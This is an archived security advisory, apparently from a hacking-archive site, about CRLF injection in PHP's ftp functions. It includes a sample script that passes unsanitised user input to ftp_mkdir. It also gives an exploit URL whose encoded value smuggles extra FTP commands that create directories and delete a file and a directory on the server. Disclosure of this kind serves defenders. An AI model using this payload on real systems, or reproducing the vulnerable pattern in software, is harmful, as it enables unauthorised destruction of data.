AOH :: Web :: PHP :: TB10075.HTM

AOH :: Web :: PHP :: TB10075.HTM
CRLF injection in PHP ftp function

CRLF injection in PHP ftp function CRLF injection in PHP ftp function


We found that there was one crlf injection in php ftp ftuntion.As same as http,you can inject a '\r\n other command' in the paramer of a ftp function like ftp_mkdir,and then php would send the \r\n to your connected ftp server.The server considerd there is a new command,and the other command would be executed.
For eg:

$ftp_server='http://www.loveshell.net'; 
$ftp_user_name='loveshell';
$ftp_user_pass='loveshell';
$command = $_GET['dir'];

$conn_id = ftp_connect($ftp_server);
$login_result = ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
if($command) ftp_mkdir($conn_id, $command);
.......

Exp: http://www.loveshell.net/test.php?dir=loveshell%0D%0AMKD jnc%0D%0ADELE jnc.txt%0D%0Armd test 

The dir loveshell and jnc are created,the jnc.txt is deleted,and the dir test is deleted.

tested on php 5.1.6,other function is vul also.
 
loveshell[at]Bug.Center.Team

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.